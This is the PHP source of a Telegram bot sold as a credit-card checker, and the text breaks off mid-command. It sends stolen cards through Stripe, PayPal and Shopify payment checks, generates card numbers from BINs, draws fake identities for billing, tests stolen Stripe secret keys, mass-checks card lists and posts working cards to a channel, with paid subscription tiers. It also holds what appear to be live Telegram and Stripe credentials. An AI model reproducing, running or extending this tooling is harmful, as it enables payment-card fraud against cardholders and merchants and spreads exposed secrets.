<?php
/**
 * BS XYRO ULTIMATE CC CHECKER BOT
 * Complete Integrated Version with Python Checkers
 * @author @HELOBIY41
 */

// ===== YOUR CONFIGURATION =====
$botToken = "8783459954:AAGAf-LwIZEtaPyxIaw1imq-dBLuf4QshBc";
$ownerId = 6185091342;
$ownerUsername = "@HELOBIY41";
$botName = "BS XYRO";
$website = "https://api.telegram.org/bot".$botToken;

// YOUR LIVE STRIPE KEYS
$stripe_sk_live = "sk_live_X5OoN89QXVeLIO7aZse3pv4L";
$stripe_pk_live = "pk_live_51ApfJGGX8lmJQndTjKrK7io1yUyrP72VJsWq9raw2VQMiL4o41dJEs3wyZphKW5CXx9z7zxJx2waMjUGU2jEVUL100UK0MU86s";

// Your Channels
$updateChannel = "@RG3741";
$statsChannel = "@RG374";
$publicGroup = "@RG3741";

// Price Configuration
$prices = [
    'daily' => ['usd' => 1, 'inr' => 80],
    'weekly' => ['usd' => 3, 'inr' => 250],
    'monthly' => ['usd' => 8, 'inr' => 600],
    'yearly' => ['usd' => 30, 'inr' => 2500]
];

// Database files
$usersDB = "users.json";
$livesDB = "lives.json";
$statsDB = "stats.json";
$adminDB = "admin.json";
$keysDB = "keys.json";
$settingsDB = "settings.json";

// Create files if not exist
$files = [$usersDB, $livesDB, $statsDB, $adminDB, $keysDB, $settingsDB];
foreach ($files as $file) {
    if (!file_exists($file)) file_put_contents($file, json_encode([]));
}

// Initialize admin
$admins = json_decode(file_get_contents($adminDB), true);
if (empty($admins)) {
    $admins[] = $ownerId;
    file_put_contents($adminDB, json_encode($admins));
}

// Initialize settings
$settings = json_decode(file_get_contents($settingsDB), true);
if (empty($settings)) {
    $settings = [
        'update_channel' => $updateChannel,
        'stats_channel' => $statsChannel,
        'group' => $publicGroup,
        'prices' => $prices,
        'welcome_msg' => "Welcome to BS XYRO Checker!",
        'maintenance' => false,
        'owner' => $ownerUsername,
        'bot_name' => $botName,
        'mass_limit' => 30,
        'retry_limit' => 3
    ];
    file_put_contents($settingsDB, json_encode($settings, JSON_PRETTY_PRINT));
}

// ===== FUNCTIONS =====

function sendMessage($chatId, $text, $reply = null) {
    global $website;
    $data = [
        'chat_id' => $chatId,
        'text' => $text,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ];
    if ($reply) $data['reply_to_message_id'] = $reply;
    
    $url = $website . "/sendMessage?" . http_build_query($data);
    return file_get_contents($url);
}

function sendAction($chatId) {
    global $website;
    $url = $website . "/sendChatAction?chat_id=" . $chatId . "&action=typing";
    file_get_contents($url);
}

function editMessage($chatId, $msgId, $text) {
    global $website;
    
    if (!$msgId || !$chatId) return false;
    
    $url = $website . "/editMessageText?" . http_build_query([
        'chat_id' => $chatId,
        'message_id' => $msgId,
        'text' => $text,
        'parse_mode' => 'HTML'
    ]);
    
    $result = @file_get_contents($url);
    
    if (!$result) {
        return sendMessage($chatId, $text);
    }
    
    return $result;
}

function getStr($string, $start, $end) {
    $str = explode($start, $string);
    if (!isset($str[1])) return '';
    $str = explode($end, $str[1]);
    return $str[0];
}

// ===== PYTHON GATE EXECUTOR =====
function executePythonGate($script, $card) {
    $scriptPath = __DIR__ . '/' . $script;
    if (!file_exists($scriptPath)) {
        return ['status' => 'DEAD', 'msg' => 'Gate script not found'];
    }
    $cardEscaped = escapeshellarg($card);
    $command = "python3 $scriptPath $cardEscaped 2>&1";
    $output = shell_exec($command);
    $result = json_decode($output, true);
    if (!$result || !isset($result['status'])) {
        error_log("Python gate error: $output");
        return ['status' => 'DEAD', 'msg' => 'Gate execution error'];
    }
    return $result;
}

// ===== FORMATTING FUNCTIONS =====

function formatHeader($gate, $type = '') {
    global $botName;
    return "『 $botName $gate $type 』\n━━━━━━━━━━━━━━━━━━━━━━━";
}

function formatCard($card) {
    $parts = explode('|', $card);
    return substr($parts[0], 0, 4) . ' ' . substr($parts[0], 4, 4) . ' ' . substr($parts[0], 8, 4) . ' ' . substr($parts[0], 12, 4);
}

function formatCardShort($card) {
    return substr($card, 0, 6) . 'XXXXXX' . substr($card, -4);
}

function getUserBadge($userId) {
    if (isAdmin($userId)) return "👑 ADMIN";
    if (isPremium($userId)) return "⭐ PREMIUM";
    return "🆓 FREE";
}

// ===== USER FUNCTIONS =====

function registerUser($userId, $username, $firstname) {
    global $usersDB;
    $users = json_decode(file_get_contents($usersDB), true);
    
    if (!isset($users[$userId])) {
        $users[$userId] = [
            'id' => $userId,
            'username' => $username,
            'name' => $firstname,
            'registered' => time(),
            'checks' => 0,
            'lives' => 0,
            'plan' => 'free',
            'expiry' => 0
        ];
        file_put_contents($usersDB, json_encode($users, JSON_PRETTY_PRINT));
        return true;
    }
    return false;
}

function isRegistered($userId) {
    global $usersDB;
    $users = json_decode(file_get_contents($usersDB), true);
    return isset($users[$userId]);
}

function isAdmin($userId) {
    global $adminDB, $ownerId;
    $admins = json_decode(file_get_contents($adminDB), true);
    return in_array($userId, $admins) || $userId == $ownerId;
}

function isPremium($userId) {
    global $usersDB;
    $users = json_decode(file_get_contents($usersDB), true);
    if (!isset($users[$userId])) return false;
    return $users[$userId]['plan'] == 'premium' && $users[$userId]['expiry'] > time();
}

function getUserPlan($userId) {
    if (isAdmin($userId)) return "👑 ADMIN";
    if (isPremium($userId)) {
        $users = json_decode(file_get_contents($GLOBALS['usersDB']), true);
        $days = floor(($users[$userId]['expiry'] - time()) / 86400);
        return "⭐ PREMIUM ($days days)";
    }
    return "🆓 FREE";
}

// ===== KEY GENERATOR =====

function generateKey($plan, $duration) {
    global $keysDB;
    
    $key = strtoupper(substr(md5(uniqid() . rand(1000, 9999)), 0, 16));
    $key = chunk_split($key, 4, '-');
    $key = rtrim($key, '-');
    
    $keys = json_decode(file_get_contents($keysDB), true);
    $keys[$key] = [
        'plan' => $plan,
        'duration' => $duration,
        'created' => time(),
        'expiry' => time() + ($duration * 86400),
        'used_by' => null,
        'active' => true
    ];
    file_put_contents($keysDB, json_encode($keys, JSON_PRETTY_PRINT));
    
    return $key;
}

function redeemKey($userId, $key) {
    global $keysDB, $usersDB;
    
    $keys = json_decode(file_get_contents($keysDB), true);
    $key = strtoupper(str_replace('-', '', $key));
    $formattedKey = chunk_split($key, 4, '-');
    $formattedKey = rtrim($formattedKey, '-');
    
    if (!isset($keys[$formattedKey])) {
        return ['success' => false, 'msg' => '❌ Invalid key!'];
    }
    
    $keyData = $keys[$formattedKey];
    
    if (!$keyData['active']) {
        return ['success' => false, 'msg' => '❌ Key already used!'];
    }
    
    if ($keyData['expiry'] < time()) {
        return ['success' => false, 'msg' => '❌ Key expired!'];
    }
    
    $users = json_decode(file_get_contents($usersDB), true);
    $users[$userId]['plan'] = 'premium';
    $users[$userId]['expiry'] = time() + ($keyData['duration'] * 86400);
    file_put_contents($usersDB, json_encode($users, JSON_PRETTY_PRINT));
    
    $keys[$formattedKey]['active'] = false;
    $keys[$formattedKey]['used_by'] = $userId;
    file_put_contents($keysDB, json_encode($keys, JSON_PRETTY_PRINT));
    
    $planNames = ['daily' => 'Daily', 'weekly' => 'Weekly', 'monthly' => 'Monthly', 'yearly' => 'Yearly'];
    return [
        'success' => true, 
        'msg' => "✅ Premium Activated!\nPlan: {$planNames[$keyData['plan']]}\nDuration: {$keyData['duration']} days"
    ];
}

// ===== BIN LOOKUP =====

function binLookup($bin) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/' . substr($bin, 0, 6));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Accept-Version: 3']);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $response = curl_exec($ch);
    curl_close($ch);
    
    $data = json_decode($response, true);
    
    return [
        'bank' => $data['bank']['name'] ?? 'N/A',
        'brand' => $data['scheme'] ?? 'N/A',
        'type' => $data['type'] ?? 'N/A',
        'level' => $data['brand'] ?? 'N/A',
        'country' => $data['country']['name'] ?? 'N/A',
        'emoji' => $data['country']['emoji'] ?? '🌍',
        'currency' => $data['country']['currency'] ?? 'USD'
    ];
}

// ===== PARSE CARD =====

function parseCard($text) {
    if (preg_match('/(\d{15,16})[\/\|\s:](\d{1,2})[\/\|\s:](\d{2,4})[\/\|\s:](\d{3,4})/', $text, $m)) {
        $cc = $m[1];
        $mm = str_pad($m[2], 2, '0', STR_PAD_LEFT);
        $yy = $m[3];
        $cvv = $m[4];
        
        if (strlen($yy) == 4) $yy = substr($yy, -2);
        
        return [
            'cc' => $cc,
            'mm' => $mm,
            'yy' => $yy,
            'cvv' => $cvv,
            'full' => "$cc|$mm|$yy|$cvv"
        ];
    }
    return null;
}

// ===== SAVE LIVE CARD =====

function saveLive($card, $gate, $binfo, $userId) {
    global $livesDB, $statsChannel, $botName;
    
    $lives = json_decode(file_get_contents($livesDB), true);
    $lives[] = [
        'card' => substr($card, 0, 6) . 'XXXXXX' . substr($card, -4),
        'gate' => $gate,
        'bank' => $binfo['bank'],
        'country' => $binfo['country'],
        'time' => date('Y-m-d H:i:s'),
        'user' => $userId
    ];
    if (count($lives) > 100) array_shift($lives);
    file_put_contents($livesDB, json_encode($lives, JSON_PRETTY_PRINT));
    
    $users = json_decode(file_get_contents($GLOBALS['usersDB']), true);
    $username = $users[$userId]['username'] ?? 'User';
    
    $msg = "『 $botName ─ LIVE 』\n";
    $msg .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $msg .= "💳 <b>Card</b> ➜ " . substr($card, 0, 6) . 'XXXXXX' . substr($card, -4) . "\n";
    $msg .= "🚪 <b>Gate</b> ➜ $gate\n";
    $msg .= "🏦 <b>Bank</b> ➜ {$binfo['bank']}\n";
    $msg .= "🌍 <b>Country</b> ➜ {$binfo['country']} {$binfo['emoji']}\n";
    $msg .= "👤 <b>Found by</b> ➜ @$username\n";
    $msg .= "⏱️ <b>Time</b> ➜ " . date('H:i:s') . "\n";
    $msg .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $msg .= "『 @RG3741 // RG374 』";
    
    if ($statsChannel) sendMessage($statsChannel, $msg);
}

// ===== UPDATE STATS =====

function updateStats($userId, $gate, $status) {
    global $statsDB, $usersDB;
    
    $stats = json_decode(file_get_contents($statsDB), true);
    $today = date('Y-m-d');
    
    if (!isset($stats[$today])) {
        $stats[$today] = [
            'total' => 0, 
            'lives' => 0, 
            'gates' => [], 
            'users' => []
        ];
    }
    
    $stats[$today]['total']++;
    
    if (!isset($stats[$today]['gates'][$gate])) $stats[$today]['gates'][$gate] = 0;
    $stats[$today]['gates'][$gate]++;
    
    if ($status == 'LIVE') {
        $stats[$today]['lives']++;
    }
    
    if (!isset($stats[$today]['users'][$userId])) {
        $stats[$today]['users'][$userId] = ['checks' => 0, 'lives' => 0];
    }
    $stats[$today]['users'][$userId]['checks']++;
    if ($status == 'LIVE') $stats[$today]['users'][$userId]['lives']++;
    
    file_put_contents($statsDB, json_encode($stats, JSON_PRETTY_PRINT));
    
    $users = json_decode(file_get_contents($usersDB), true);
    if (isset($users[$userId])) {
        $users[$userId]['checks']++;
        if ($status == 'LIVE') $users[$userId]['lives']++;
        file_put_contents($usersDB, json_encode($users, JSON_PRETTY_PRINT));
    }
}

// ===== PYTHON GATES =====

function gateStripe($card) {
    $result = executePythonGate('stripe_auth2.py', $card);
    $binfo = binLookup(explode('|',$card)[0]);
    $result['binfo'] = $binfo;
    $result['time'] = 0;
    return $result;
}

function gateAuth($card) {
    $result = executePythonGate('qee.py', $card);
    $binfo = binLookup(explode('|',$card)[0]);
    $result['binfo'] = $binfo;
    $result['time'] = 0;
    return $result;
}

function gateBr($card) {
    $result = executePythonGate('paypal_exe.py', $card);
    $binfo = binLookup(explode('|',$card)[0]);
    $result['binfo'] = $binfo;
    $result['time'] = 0;
    return $result;
}

function gateChk($card) {
    $result = executePythonGate('str_charge.py', $card);
    $binfo = binLookup(explode('|',$card)[0]);
    $result['binfo'] = $binfo;
    $result['time'] = 0;
    return $result;
}

function gateShopify($card) {
    $result = executePythonGate('shopify_iyzico.py', $card);
    $binfo = binLookup(explode('|',$card)[0]);
    $result['binfo'] = $binfo;
    $result['time'] = 0;
    return $result;
}

// ===== TOOLS =====

function toolGen($input) {
    $parts = explode(' ', $input);
    $format = $parts[0];
    $quantity = isset($parts[1]) ? min((int)$parts[1], 20) : 5;
    
    $formatParts = explode('|', $format);
    if (count($formatParts) < 4) return null;
    
    $bin = $formatParts[0];
    $mes = $formatParts[1];
    $ano = $formatParts[2];
    $cvv = $formatParts[3];
    
    $cards = [];
    for ($i = 0; $i < $quantity; $i++) {
        $cc = preg_replace('/[^0-9]/', '', $bin);
        while (strlen($cc) < 15) {
            $cc .= rand(0, 9);
        }
        
        $sum = 0;
        $alt = true;
        for ($j = strlen($cc) - 1; $j >= 0; $j--) {
            $d = (int)$cc[$j];
            if ($alt) {
                $d *= 2;
                if ($d > 9) $d -= 9;
            }
            $sum += $d;
            $alt = !$alt;
        }
        $check = (10 - ($sum % 10)) % 10;
        $cc .= $check;
        
        if ($mes == 'x' || $mes == 'xx') {
            $genMes = str_pad(rand(1, 12), 2, '0', STR_PAD_LEFT);
        } else {
            $genMes = $mes;
        }
        
        if ($ano == 'x' || $ano == 'xx') {
            $genAno = rand(25, 30);
        } else {
            $genAno = $ano;
        }
        
        if ($cvv == 'x' || $cvv == 'xx' || $cvv == 'xxx') {
            $genCvv = $cc[0] == '3' ? rand(1000, 9999) : rand(100, 999);
        } else {
            $genCvv = $cvv;
        }
        
        $cards[] = "$cc|$genMes|$genAno|$genCvv";
    }
    
    return $cards;
}

function toolRand($country = 'us') {
    $url = "https://randomuser.me/api/1.4/?nat=" . strtolower($country);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $result = curl_exec($ch);
    curl_close($ch);
    
    $data = json_decode($result, true);
    $user = $data['results'][0] ?? null;
    
    if (!$user) return null;
    
    $location = $user['location'];
    $name = $user['name'];
    
    return [
        'first' => $name['first'],
        'last' => $name['last'],
        'street' => $location['street']['number'] . ' ' . $location['street']['name'],
        'city' => $location['city'],
        'state' => $location['state'],
        'postcode' => $location['postcode'],
        'country' => $location['country'],
        'phone' => $user['phone'],
        'email' => $user['email']
    ];
}

function toolSk($key) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'card[number]=4242424242424242&card[exp_month]=12&card[exp_year]=2025&card[cvc]=123');
    curl_setopt($ch, CURLOPT_USERPWD, $key . ':');
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $result = curl_exec($ch);
    curl_close($ch);
    
    $data = json_decode($result, true);
    
    if (isset($data['id'])) {
        return '✅ LIVE KEY';
    } elseif (isset($data['error'])) {
        if ($data['error']['type'] == 'card_error') {
            return '✅ LIVE KEY';
        } elseif (strpos($data['error']['message'], 'testmode') !== false) {
            return '⚠️ TEST KEY';
        } else {
            return '❌ DEAD KEY';
        }
    }
    
    return '❌ INVALID KEY';
}

// ===== MASS CHECK =====

function massCheck($cards, $userId, $chatId, $msgId) {
    global $settings, $botName;
    
    $results = [];
    $lives = [];
    $total = count($cards);
    
    $progressMsg = sendMessage($chatId, "『 $botName ─ MASS 』\n━━━━━━━━━━━━━━━━━━━━━━━\n⏳ <b>Processing:</b> 0/$total\n━━━━━━━━━━━━━━━━━━━━━━━");
    
    for ($i = 0; $i < $total; $i++) {
        $card = $cards[$i];
        $parts = explode('|', $card);
        
        $gates = ['gateStripe', 'gateAuth', 'gateBr', 'gateChk', 'gateShopify'];
        $gateFunc = $gates[array_rand($gates)];
        $gateName = str_replace('gate', '', $gateFunc);
        
        $result = $gateFunc($card);
        
        $statusIcon = $result['status'] == 'LIVE' ? '✅' : '❌';
        $shortCard = formatCardShort($card);
        
        $results[] = "$statusIcon $shortCard - {$result['msg']}";
        
        if ($result['status'] == 'LIVE') {
            $lives[] = $card;
            saveLive($card, 'MASS', $result['binfo'], $userId);
        }
        
        updateStats($userId, 'MASS', $result['status']);
        
        if (($i + 1) % 5 == 0 || $i == $total - 1) {
            $progress = "『 $botName ─ MASS 』\n━━━━━━━━━━━━━━━━━━━━━━━\n";
            $progress .= "⏳ <b>Processing:</b> " . ($i + 1) . "/$total\n";
            $progress .= "✅ <b>Lives:</b> " . count($lives) . "\n";
            $progress .= "━━━━━━━━━━━━━━━━━━━━━━━";
            editMessage($chatId, $progressMsg, $progress);
        }
        
        usleep(100000);
    }
    
    $text = "『 $botName ─ MASS 』\n━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "✅ <b>Total:</b> $total\n";
    $text .= "💚 <b>Lives:</b> " . count($lives) . "\n";
    $text .= "❌ <b>Dead:</b> " . ($total - count($lives)) . "\n";
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    
    if (count($lives) > 0) {
        $text .= "🎯 <b>LIVE CARDS:</b>\n";
        foreach ($lives as $live) {
            $parts = explode('|', $live);
            $text .= "✅ " . formatCardShort($live) . "\n";
        }
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    }
    
    $text .= "👤 <b>Checked by:</b> @{$GLOBALS['username']} [" . getUserPlan($userId) . "]\n";
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "『 @RG3741 // RG374 』";
    
    editMessage($chatId, $progressMsg, $text);
}

// ===== PUBLIC STATS =====

function getPublicStats() {
    global $statsDB, $livesDB, $usersDB, $botName;
    
    $stats = json_decode(file_get_contents($statsDB), true);
    $lives = json_decode(file_get_contents($livesDB), true);
    $users = json_decode(file_get_contents($usersDB), true);
    
    $today = date('Y-m-d');
    $todayStats = $stats[$today] ?? ['total' => 0, 'lives' => 0];
    
    $totalChecks = 0;
    $totalLives = 0;
    foreach ($stats as $day => $s) {
        $totalChecks += $s['total'];
        $totalLives += $s['lives'];
    }
    
    $recentLives = array_slice(array_reverse($lives), 0, 5);
    
    $text = "『 $botName ─ STATS 』\n";
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "📊 <b>TODAY</b>\n";
    $text .= "• Checks: {$todayStats['total']}\n";
    $text .= "• Lives: {$todayStats['lives']}\n";
    $text .= "• Rate: " . ($todayStats['total'] > 0 ? round(($todayStats['lives'] / $todayStats['total']) * 100, 1) : 0) . "%\n";
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "📈 <b>ALL TIME</b>\n";
    $text .= "• Checks: $totalChecks\n";
    $text .= "• Lives: $totalLives\n";
    $text .= "• Users: " . count($users) . "\n";
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "✅ <b>RECENT LIVES</b>\n";
    foreach ($recentLives as $live) {
        $text .= "💳 {$live['card']} - {$live['gate']}\n";
    }
    $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
    $text .= "『 @RG3741 // RG374 』";
    
    return $text;
}

// ===== HANDLE WEBHOOK =====
$update = json_decode(file_get_contents('php://input'), true);
if (!$update) exit;

$chatId = $update['message']['chat']['id'] ?? null;
$userId = $update['message']['from']['id'] ?? null;
$message = $update['message']['text'] ?? '';
$msgId = $update['message']['message_id'] ?? null;
$username = $update['message']['from']['username'] ?? 'NoUsername';
$firstname = $update['message']['from']['first_name'] ?? 'User';

if (!$chatId || !$userId) exit;

sendAction($chatId);

if ($message[0] == '/' && !isRegistered($userId)) {
    registerUser($userId, $username, $firstname);
}

$cmd = explode(' ', $message)[0];
$args = trim(substr($message, strlen($cmd)));

$settings = json_decode(file_get_contents($settingsDB), true);
if ($settings['maintenance'] && !isAdmin($userId)) {
    sendMessage($chatId, "🔧 Bot under maintenance. Updates: {$settings['update_channel']}", $msgId);
    exit;
}

// ===== COMMANDS =====
switch ($cmd) {
    
    case '/start':
        $text = "『 $botName 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👋 <b>Welcome to $botName!</b>\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n\n";
        $text .= "🤖 <b>Bot by:</b> @HELOBIY41\n";
        $text .= "📢 <b>Updates:</b> @RG3741\n";
        $text .= "📊 <b>Stats:</b> @RG374\n\n";
        $text .= "💰 <b>CHEAP PRICES</b>\n";
        $text .= "• Daily: \${$settings['prices']['daily']['usd']} / ₹{$settings['prices']['daily']['inr']}\n";
        $text .= "• Weekly: \${$settings['prices']['weekly']['usd']} / ₹{$settings['prices']['weekly']['inr']}\n";
        $text .= "• Monthly: \${$settings['prices']['monthly']['usd']} / ₹{$settings['prices']['monthly']['inr']}\n";
        $text .= "• Yearly: \${$settings['prices']['yearly']['usd']} / ₹{$settings['prices']['yearly']['inr']}\n\n";
        $text .= "📋 <b>Commands:</b>\n";
        $text .= "• /cmds - All commands\n";
        $text .= "• /gates - Available gates\n";
        $text .= "• /tools - Available tools\n";
        $text .= "• /buy - Buy premium\n";
        $text .= "• /redeem [key] - Redeem key\n";
        $text .= "• /stats - Public stats\n";
        $text .= "• /info - Your info\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/cmds':
        $plan = getUserPlan($userId);
        
        $text = "『 $botName ─ COMMANDS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👤 <b>Your Plan:</b> $plan\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n\n";
        $text .= "💳 <b>GATES (FREE)</b>\n";
        $text .= "/str card|mm|yy|cvv - Stripe Auth\n";
        $text .= "/au card|mm|yy|cvv - QEE PayPal\n\n";
        
        $text .= "⭐ <b>GATES (PREMIUM)</b>\n";
        $text .= "/br card|mm|yy|cvv - PayPal Charge\n";
        $text .= "/chk card|mm|yy|cvv - Stripe Charge\n";
        $text .= "/sf card|mm|yy|cvv - Shopify Iyzico\n\n";
        
        $text .= "📦 <b>MASS CHECK (PREMIUM)</b>\n";
        $text .= "/mass [cards] - Check multiple cards\n";
        $text .= "• Send .txt file with cards\n\n";
        
        $text .= "🔧 <b>TOOLS</b>\n";
        $text .= "/bin 400022 - BIN Lookup\n";
        $text .= "/gen 400022|x|25|xxx 10 - CC Generator\n";
        $text .= "/rand us - Address Generator\n";
        $text .= "/sk sk_live_xxx - Stripe Key Check\n\n";
        
        $text .= "📊 <b>STATS</b>\n";
        $text .= "/info - Your info\n";
        $text .= "/stats - Public stats\n";
        $text .= "/mystats - Your stats\n";
        $text .= "/lives - Recent lives\n\n";
        
        $text .= "📢 <b>Updates:</b> @RG3741\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        if (isAdmin($userId)) {
            $text .= "\n\n👑 <b>ADMIN</b>\n";
            $text .= "/admin - Admin panel\n";
            $text .= "/genkey [plan] [days] - Generate key\n";
            $text .= "/keys - List all keys\n";
            $text .= "/users - List users\n";
            $text .= "/logs - View logs\n";
            $text .= "/broadcast [msg] - Send to all\n";
            $text .= "/setprice [plan] [usd] [inr] - Set prices\n";
            $text .= "/maintenance - Toggle maintenance\n";
            $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        }
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/gates':
        $text = "『 $botName ─ GATES 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "✅ <b>FREE GATES</b>\n";
        $text .= "• /str - Stripe Auth\n";
        $text .= "• /au - QEE PayPal\n\n";
        
        $text .= "⭐ <b>PREMIUM GATES</b>\n";
        $text .= "• /br - PayPal Charge\n";
        $text .= "• /chk - Stripe Charge\n";
        $text .= "• /sf - Shopify Iyzico\n\n";
        
        $text .= "💰 Buy premium: /buy\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/tools':
        $text = "『 $botName ─ TOOLS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "🔍 <b>BIN Lookup</b>\n";
        $text .= "/bin 400022\n\n";
        
        $text .= "🎴 <b>CC Generator</b>\n";
        $text .= "/gen 400022|x|25|xxx 10\n\n";
        
        $text .= "📍 <b>Address Generator</b>\n";
        $text .= "/rand us\n";
        $text .= "/rand gb\n";
        $text .= "/rand ca\n\n";
        
        $text .= "🔑 <b>Stripe Key Check</b>\n";
        $text .= "/sk sk_live_xxx\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/buy':
        $text = "『 $botName ─ PREMIUM 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "💰 <b>CHEAP RATES</b>\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n\n";
        $text .= "⚡ <b>DAILY</b>\n";
        $text .= "• Price: \${$settings['prices']['daily']['usd']} / ₹{$settings['prices']['daily']['inr']}\n";
        $text .= "• Duration: 1 Day\n\n";
        
        $text .= "📅 <b>WEEKLY</b>\n";
        $text .= "• Price: \${$settings['prices']['weekly']['usd']} / ₹{$settings['prices']['weekly']['inr']}\n";
        $text .= "• Duration: 7 Days\n\n";
        
        $text .= "🔥 <b>MONTHLY</b> (Best Value)\n";
        $text .= "• Price: \${$settings['prices']['monthly']['usd']} / ₹{$settings['prices']['monthly']['inr']}\n";
        $text .= "• Duration: 30 Days\n";
        $text .= "• Mass Checker\n\n";
        
        $text .= "💎 <b>YEARLY</b>\n";
        $text .= "• Price: \${$settings['prices']['yearly']['usd']} / ₹{$settings['prices']['yearly']['inr']}\n";
        $text .= "• Duration: 365 Days\n";
        $text .= "• Lifetime Access\n\n";
        
        $text .= "📲 Contact @HELOBIY41 to buy\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/redeem':
        $key = trim($args);
        if (!$key) {
            sendMessage($chatId, "❌ Use: /redeem XXXX-XXXX-XXXX-XXXX", $msgId);
            break;
        }
        
        $result = redeemKey($userId, $key);
        sendMessage($chatId, $result['msg'], $msgId);
        break;
    
    case '/info':
        $users = json_decode(file_get_contents($usersDB), true);
        $user = $users[$userId] ?? [];
        $plan = getUserPlan($userId);
        
        $text = "『 $botName ─ INFO 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "👤 <b>User ID:</b> <code>$userId</code>\n";
        $text .= "📝 <b>Name:</b> $firstname\n";
        $text .= "🔰 <b>Username:</b> @$username\n";
        $text .= "💎 <b>Plan:</b> $plan\n";
        $text .= "📊 <b>Checks:</b> " . ($user['checks'] ?? 0) . "\n";
        $text .= "✅ <b>Lives:</b> " . ($user['lives'] ?? 0) . "\n";
        $text .= "📅 <b>Joined:</b> " . (isset($user['registered']) ? date('d M Y', $user['registered']) : 'Today') . "\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/mystats':
        $stats = json_decode(file_get_contents($statsDB), true);
        $userStats = [];
        $totalChecks = 0;
        $totalLives = 0;
        
        foreach ($stats as $day => $s) {
            if (isset($s['users'][$userId])) {
                $userStats[$day] = $s['users'][$userId];
                $totalChecks += $s['users'][$userId]['checks'];
                $totalLives += $s['users'][$userId]['lives'];
            }
        }
        
        $text = "『 $botName ─ MY STATS 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "📊 <b>Total Checks:</b> $totalChecks\n";
        $text .= "✅ <b>Total Lives:</b> $totalLives\n";
        $text .= "📈 <b>Success Rate:</b> " . ($totalChecks > 0 ? round(($totalLives / $totalChecks) * 100, 1) : 0) . "%\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "<b>Last 7 Days:</b>\n";
        for ($i = 6; $i >= 0; $i--) {
            $day = date('Y-m-d', strtotime("-$i days"));
            if (isset($userStats[$day])) {
                $text .= "• " . date('d M', strtotime($day)) . ": {$userStats[$day]['checks']} checks, {$userStats[$day]['lives']} lives\n";
            }
        }
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/stats':
        $text = getPublicStats();
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/lives':
        $lives = json_decode(file_get_contents($livesDB), true);
        $lives = array_reverse($lives);
        
        if (empty($lives)) {
            sendMessage($chatId, "『 $botName ─ LIVES 』\n━━━━━━━━━━━━━━━━━━━━━━━\n📭 No live cards yet\n━━━━━━━━━━━━━━━━━━━━━━━", $msgId);
            break;
        }
        
        $text = "『 $botName ─ LIVES 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $count = 0;
        foreach ($lives as $live) {
            if ($count++ >= 10) break;
            $text .= "💳 <code>{$live['card']}</code>\n";
            $text .= "└ {$live['gate']} - {$live['bank']}\n";
            $text .= "└ {$live['time']}\n\n";
        }
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━";
        
        sendMessage($chatId, $text, $msgId);
        break;
    
    case '/bin':
        $bin = trim($args);
        if (!$bin || strlen($bin) < 6) {
            sendMessage($chatId, "❌ Use: /bin 400022", $msgId);
            break;
        }
        
        $info = binLookup($bin);
        
        $text = "『 $botName ─ BIN 』\n";
        $text .= "━━━━━━━━━━━━━━━━━━━━━━━\n";
        $text .= "🔍 <b>BIN:</b> <code>$bin</code>\n";
        $text .= "💳 <b>Brand:</b> {$info['brand']}\n";
        $text .= "📝 <b>Type:</b> {$info['type']}\n";
